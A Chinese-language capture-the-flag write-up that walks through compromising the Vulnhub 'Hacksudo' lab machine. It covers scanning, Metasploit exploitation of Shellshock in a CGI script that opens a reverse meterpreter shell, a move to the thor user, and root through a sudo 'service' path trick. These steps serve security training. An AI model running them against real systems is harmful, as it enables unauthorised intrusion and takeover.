Hacksudo
靶机信息(Target Information)
目标主机信息:
名称: Hacksudo
环境Setup: 将目标主机的网络模式修改为Host-only, 而攻击机Kali Linux的其中一块网卡也设置为host-only模式, 使得二者位于同一个LAN
识别靶机IP地址( Identify IP Address of Target)
─(kali㉿kali)-[~/Vulnhub/Hacksudo]
└─$ sudo netdiscover -i eth1
利用netdiscover工具识别目标主机的IP地址为192.168.56.133
端口及服务扫描(NMAP Scanning)
──(kali㉿kali)-[~/Vulnhub/Hacksudo]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.133 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-23 09:00 EDT
Nmap scan report for bogon (192.168.56.133)
Host is up (0.00012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
| 256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_ 256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:72:FB:D9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds
NMAP扫描结果表明目标主机仅有2个开放端口,21端口为Filtered状态,需手动验证该端口是否开放:
──(kali㉿kali)-[~/Vulnhub/Hacksudo]
└─$ ftp 192.168.56.133
ftp: Can't connect to `192.168.56.133:21': Connection refused
ftp: Can't connect to `192.168.56.133:ftp'
ftp>
信息收集以及寻找漏洞(Enumeration)
由于SSH服务的版本没有漏洞,因此需要围绕80端口展开信息的进一步收集。
首先看下apache 2.4.38版本有无漏洞,结果表明不存在明显漏洞
─$ searchsploit apache 2.4.38
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Es | linux/local/46676.php
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal | linux/webapps/39642.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Byp | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Byp | windows/webapps/42953.txt
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execut | linux/remote/34.pl
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
用浏览器访问目标的Web服务,默认页面为用户登录页面,查看网页源代码,没有有兴趣的信息,查看是否存在robots.txt文件,结果是否定的。
既然是用户登录,因此看是否存在SQL Injection漏洞,因此依据
https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
尝试login bypass,对用户名输入框以及密码输入框均进行尝试,结果没有成功
接下来扫描一下目标主机有哪些目录,需要注意的是gobuster没有扫描出有价值的目录,只有/images 和/fonts,这些都是静态文件存放的目录,接下来用dirb工具扫描,发现了/cgi-bin目录
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo]
└─$ gobuster dir -u http://192.168.56.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.133
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/10/23 09:03:09 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.133/images/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.133/fonts/]
/server-status (Status: 403) [Size: 279]
===============================================================
2022/10/23 09:03:23 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo]
└─$ dirb http://192.168.56.133
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Oct 23 09:03:34 2022
URL_BASE: http://192.168.56.133/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.133/ ----
+ http://192.168.56.133/cgi-bin/ (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.133/fonts/
==> DIRECTORY: http://192.168.56.133/images/
+ http://192.168.56.133/index.php (CODE:200|SIZE:5357)
+ http://192.168.56.133/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.133/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.133/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun Oct 23 09:03:35 2022
DOWNLOADED: 4612 - FOUND: 3
虽然dirb工具发现了/cgi-bin目录,但不能直接访问目录(forbidden),因此需要找出该目录下有哪些文件
禁止访问
需要扫描一下该目录一下有什么文件
需要注意cgi-bin.联想到需要扫描一下是否有shell文件
─$ gobuster dir -u http://192.168.56.133/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.133/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2022/10/23 09:09:46 Starting gobuster in directory enumeration mode
===============================================================
/shell.sh (Status: 500) [Size: 612]
看是否存在shellshock漏洞
(备注:shellshock漏洞)
先用Metsploit里的auxiliary模块识别目标是否存在shellshock漏洞
msf6 > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
2 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
3 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
4 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
5 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
6 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
7 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
8 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
9 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
10 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)
11 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec
msf6 > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show options
Module options (auxiliary/scanner/http/apache_mod_cgi_bash_env):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /usr/bin/id yes Command to run (absolute paths required)
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framewor
k/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI yes Path to CGI script
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RHOSTS 192.168.56.133
RHOSTS => 192.168.56.133
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/shell.sh
TARGETURI => /cgi-bin/shell.sh
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show options
Module options (auxiliary/scanner/http/apache_mod_cgi_bash_env):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /usr/bin/id yes Command to run (absolute paths required)
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.133 yes The target host(s), see https://github.com/rapid7/metasploit-framew
ork/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /cgi-bin/shell.sh yes Path to CGI script
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit
[+] uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
运行结果表明目标存在shellshock漏洞,接下来同样是利用Metasploit的利用(exploit)模块获得目标主机的Shell
Exploit
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-fram
ework/wiki/Using-Metasploit
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an
address on the local machine or 0.0.0.0 to listen on all address
es.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 192.168.56.133
RHOSTS => 192.168.56.133
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/shell.sh
TARGETURI => /cgi-bin/shell.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show advanced
Module advanced options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMDSTAGER::DECODER no The decoder stub to use.
CMDSTAGER::FLAVOR auto no The CMD Stager to use. (Accepted: auto, echo,
printf)
CMDSTAGER::SSL false no Use SSL/TLS for supported stagers
CMDSTAGER::TEMP no Writable directory for staged files
CMDSTAGER::URIPATH no Payload URI path for supported stagers
ContextInformationFile no The information file that contains context in
formation
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers.
Only set to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected pay
load
EXE::Custom no Use custom exe instead of automatically gener
ating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular pay
load exe
EXE::FallBack false no Use the default template in case the specifie
d one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation me
thod.
EXE::Path no The directory in which to look for the execut
able template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint verificatio
n
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authenticati
on
HttpRawHeaders no Path to ERB-templatized raw headers to append
to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrac
e (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authenticati
on
ListenerBindAddress no The specific IP address to bind to if differe
nt from SRVHOST
ListenerBindPort no The port to bind to if different from SRVPORT
ListenerComm no The specific communication channel to use for
this service
MSI::Custom no Use custom msi instead of automatically gener
ating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular pay
load msi
MSI::Path no The directory in which to look for the msi te
mplate
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to
SYSTEM if accepted)
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-
SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Au
to, TLS and SSL23 are auto-negotiate) (Accept
ed: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS
1.2)
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
UserAgent Mozilla/5.0 (Windows NT 10 no The User-Agent header to use for all requests
.0; Win64; x64) AppleWebKi
t/537.36 (KHTML, like Geck
o) Chrome/98.0.4758.81 Saf
ari/537.36 Edg/97.0.1072.6
9
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a ses
sion
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.133 yes The target host(s), see https://github.com/rapid7/metasploit-fr
amework/wiki/Using-Metasploit
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be
an address on the local machine or 0.0.0.0 to listen on all add
resses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated
)
TARGETURI /cgi-bin/shell.sh yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.101 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
[*] Started reverse TCP handler on 192.168.56.101:5555
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (989032 bytes) to 192.168.56.133
[*] Meterpreter session 1 opened (192.168.56.101:5555 -> 192.168.56.133:36122) at 2022-10-23 10:08:51 -0400
meterpreter > getuid
Server username: www-data
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > shell
Process 1791 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.3$
水平权限(Lateral Movement)
sudo -l
Matching Defaults entries for www-data on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on HackSudoThor:
(thor) NOPASSWD: /home/thor/./hammer.sh
bash-4.3$
表明可以用thor身份执行hammer.sh脚本
bash-4.3$ sudo -l
sudo -l
Matching Defaults entries for www-data on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on HackSudoThor:
(thor) NOPASSWD: /home/thor/./hammer.sh
bash-4.3$ ls -alh /home/thor/./hammer.sh
ls -alh /home/thor/./hammer.sh
ls: cannot access '/home/thor/./hammer.sh': Permission denied
bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh
HELLO want to talk to Thor?
Enter Thor Secret Key : hello
hello
Hey Dear ! I am hello , Please enter your Secret massage : great
great
Thank you for your precious time!
bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh
HELLO want to talk to Thor?
Enter Thor Secret Key : hi
hi
Hey Dear ! I am hi , Please enter your Secret massage : bash
bash
id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
发现输入bash,就可以拿到thor用户的shell( 但是实在话,为什么可以找到这个突破点我就不清楚了)
提权( Privilege Escalation)
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for thor on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User thor may run the following commands on HackSudoThor:
(root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
thor@HacksudoThor:/usr/lib/cgi-bin$
发现可以不用密码执行/usr/bin/cat /usr/sbin/service, 此时可以参考GTFOBINS网站的方法进行提权,用/usr/bin/cat命令可以读取任何文件,此处用/usr/sbin/service
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo /usr/sbin/service ../../bin/sh
sudo /usr/sbin/service ../../bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# bash -i
bash -i
bash-4.3# ls -alh
ls -alh
total 64K
drwx------ 6 root root 4.0K Jul 30 2021 .
drwxr-xr-x 18 root root 4.0K Jul 29 2021 ..
-rw------- 1 root root 302 Aug 2 2021 .bash_history
-rw-r--r-- 1 root root 598 Jun 24 2021 .bashrc
drwxr-xr-x 3 root root 4.0K Jun 24 2021 .cache
drwx------ 3 root root 4.0K Jun 11 2021 .gnupg
-rw------- 1 root root 28 Jun 24 2021 .lesshst
drwxr-xr-x 3 root root 4.0K Jun 11 2021 .local
-rw------- 1 root root 2.4K Jul 30 2021 .mysql_history
-rw-r--r-- 1 root root 144 Jun 23 2021 .pearrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Aug 2 2021 .ssh
-rw-r--r-- 1 root root 493 Jun 15 2021 .wget-hsts
-rw-r--r-- 1 root root 7.0K Jul 30 2021 proof.txt
-rw------- 1 root root 7 Aug 2 2021 root.txt
bash-4.3# cat root.txt
cat root.txt